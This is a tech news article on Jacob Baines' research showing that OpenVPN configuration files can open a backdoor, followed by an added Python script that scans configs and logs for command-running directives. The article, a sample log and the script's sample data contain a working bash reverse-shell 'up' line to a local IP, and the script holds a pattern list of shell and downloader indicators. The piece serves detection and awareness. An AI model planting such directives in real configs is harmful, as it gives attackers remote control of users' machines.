Category: IT|Jun 23, 2018 | Author: Admin

Downloading 3rd Party OpenVPN Configs May Be Dangerous. Here’s Why.


Call me a cynic, but one thing I have learned from using the Internet is to double-check, if not triple-check, everything you download. So many downloads carry malware, adware, and scripts that perform malicious activities on your computer that thoroughly checking a download before it is used should be a requirement.


This point is shown in research posted by Tenable reverse engineer Jacob Baines, where he shows how a normally harmless VPN configuration file can be used to open a backdoor on a computer that uses it. 

OpenVPN configs can execute commands
In his article, Baines explains how a simple OpenVPN configuration file can be used to execute commands on a computer after a VPN connection is made. This would allow attackers to distribute OpenVPN configuration files that automatically open a backdoor through a reverse shell or perform other unwanted actions on the computer.

OpenVPN is a popular open-source VPN program that allows you to create a secure and encrypted network connection between your computer or device and another network. Due to its popularity, it has been ported to work on a variety of devices, including routers that run DD-WRT. To facilitate this, VPN providers create OpenVPN profiles that can be downloaded and installed in order to easily configure a VPN connection.

According to Baines, all a bad actor needs to do is add a few lines to a harmless OpenVPN configuration file (.ovpn) to make it malicious. In Baines' example, an OpenVPN configuration file is simply a text file with a few directives in it:

remote 192.168.1.245
ifconfig 10.200.0.2 10.200.0.1
dev tun

If an actor wanted the OpenVPN configuration file to execute a command, they would add a "script-security 2" line, which allows user-defined scripts to be executed, and an "up" entry, which contains the command OpenVPN runs once the tunnel interface has been brought up. As an example, he changed the above configuration file so that it executes a command, as shown below.

remote 192.168.1.245
ifconfig 10.200.0.2 10.200.0.1
dev tun
script-security 2
up "/bin/bash -c '/bin/bash -i > /dev/tcp/192.168.1.218/8181 0<&1 2>&1&'"

When this configuration file is used and after a connection has been established, OpenVPN will execute the above command to open a reverse shell to the computer at 192.168.1.218. This would allow the attacker at that IP address to execute commands on the remote computer that ran the OpenVPN configuration file.

Baines even goes on to show how the above method could be ported to attack Windows users by using a PowerShell script instead.

While this shows you should be careful about downloading OpenVPN configs from third parties, Baines told BleepingComputer that he has not found any malicious configs currently in the wild.

How do you detect malicious OpenVPN configuration files?
Now that you know that OpenVPN configuration files could be used against you, you may be wondering how to check whether any that you use are malicious.

In his article, Baines states that you can find clues in a VPN connection log as shown below.

Thu Jun 7 12:28:23 2018 NOTE: the current --script-security setting may allow this configuration to call user-defined scripts
Thu Jun 7 12:28:23 2018 /bin/bash -c /bin/bash -i > /dev/tcp/192.168.1.218/8181 0<&1 2>&1& tun0 1500 1500 10.200.0.2 10.200.0.1 init

If you see the above lines in your log, it means the "script-security 2" setting was used, which allows user-defined scripts to be executed. As that line is required to run scripts, it would follow that something is being executed by the configuration file. You should be able to spot the command being executed as shown by the second line in the log above.

As OpenVPN configuration files are simply text files, you can also check whether an OpenVPN configuration is malicious by opening the file in Notepad or another text editor. This lets you read the entire configuration file and spot any directives that execute commands.

Unfortunately, OpenVPN has other configuration directives that can execute commands as well, and Baines recommends that users use the Viscosity OpenVPN client instead, which filters out these types of directives.

"Unfortunately, the up command is not the only command that can be used in this way," Baines told BleepingComputer. "Up, down, client-connect, learn-address, auth-user-pass-verify, and learn-address all execute configuration specified commands (although some of these are server specific). A layperson might try to review and understand the configuration file. However, I think it's safer to use a client like viscosity that simply filters out this behavior."
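As an added example (not code from the article or from Baines' research), the following Python script applies both checks described above: it parses an .ovpn file for the script-security level and for directives whose argument is a command, and it scans a client log for the script-security NOTE line and for logged commands that look like a reverse shell. The directive list extends the one in the quote with the other script hooks documented in the OpenVPN manual (route-up, route-pre-down, ipchange, tls-verify, client-disconnect). The sample config and log lines are constructed for this example, and the reverse-shell indicator patterns are a triage heuristic, not a complete list.

```python
"""Flag OpenVPN config directives and log lines that indicate command execution.

Added example, not part of the article or of Baines' research. Directive names
are taken from the OpenVPN manual; sample data below is constructed.
"""
import re
import shlex

# Directives whose argument is a command OpenVPN runs when --script-security is 2+.
# up, down, client-connect, learn-address and auth-user-pass-verify are named in the
# article; the others are additional script hooks from the OpenVPN manual.
SCRIPT_DIRECTIVES = {
    "up", "down", "route-up", "route-pre-down", "ipchange", "tls-verify",
    "client-connect", "client-disconnect", "learn-address", "auth-user-pass-verify",
}

# Heuristic reverse-shell / downloader indicators (Linux and Windows), for triage only.
SUSPICIOUS = re.compile(
    r"/dev/tcp/|bash -i|\bnc\b.*-e|\bncat\b|powershell|certutil|curl .*\|\s*(ba)?sh|wget ",
    re.IGNORECASE,
)


def parse_config(text):
    """Yield (directive, args) pairs; skips comments and inline <ca>...</ca>-style blocks
    so certificate/key material can never be mistaken for a directive."""
    in_block = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if in_block:
            if line == f"</{in_block}>":
                in_block = None
            continue
        m = re.fullmatch(r"<([a-z-]+)>", line)
        if m:
            in_block = m.group(1)
            continue
        try:
            tokens = shlex.split(line)  # handles the nested quoting used by "up"
        except ValueError:  # unbalanced quotes: fall back to whitespace split
            tokens = line.split()
        if tokens:
            yield tokens[0], tokens[1:]


def scan_config(text):
    """Return a list of findings for one config; an empty list means nothing flagged.
    Note that legitimate profiles sometimes use "up" (e.g. DNS helper scripts), so a
    plain "executes command" finding is a prompt to read the command, not a verdict."""
    findings = []
    for directive, args in parse_config(text):
        if directive == "script-security" and args:
            level = int(args[0]) if args[0].isdigit() else 0
            if level >= 2:  # 0/1 never run user-defined scripts (manual: default is 1)
                findings.append(f"script-security {level}: user-defined scripts enabled")
        elif directive in SCRIPT_DIRECTIVES:
            cmd = " ".join(args)
            tag = "SUSPICIOUS" if SUSPICIOUS.search(cmd) else "executes command"
            findings.append(f"{directive} ({tag}): {cmd}")
    return findings


def scan_log(lines):
    """Flag the script-security NOTE and any logged command matching the indicators."""
    hits = []
    for line in lines:
        if "--script-security setting may allow" in line:
            hits.append("script-security NOTE: config may run user scripts")
        elif SUSPICIOUS.search(line):
            hits.append("suspicious command in log: " + line.strip())
    return hits


# Constructed sample profile: a normal client config with the backdoor hook added.
SAMPLE_CONFIG = """\
# constructed sample
client
remote 192.168.1.245
ifconfig 10.200.0.2 10.200.0.1
dev tun
<ca>
-----BEGIN CERTIFICATE-----
up /tmp/decoy-line-inside-cert-block
-----END CERTIFICATE-----
</ca>
script-security 2
up "/bin/bash -c '/bin/bash -i > /dev/tcp/192.168.1.218/8181 0<&1 2>&1&'"
"""

# Constructed sample log lines modelled on the ones shown in the article.
SAMPLE_LOG = [
    "Thu Jun 7 12:28:23 2018 NOTE: the current --script-security setting may allow this configuration to call user-defined scripts",
    "Thu Jun 7 12:28:23 2018 /bin/bash -c /bin/bash -i > /dev/tcp/192.168.1.218/8181 0<&1 2>&1& tun0 1500 1500 10.200.0.2 10.200.0.1 init",
    "Thu Jun 7 12:28:24 2018 Initialization Sequence Completed",
]

if __name__ == "__main__":
    for finding in scan_config(SAMPLE_CONFIG):
        print("config:", finding)
    for hit in scan_log(SAMPLE_LOG):
        print("log:", hit)
```

Run it against your own profiles with scan_config(open("client.ovpn").read()); the decoy line inside the <ca> block in the sample shows why the parser must skip inline certificate blocks rather than grepping for "^up".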
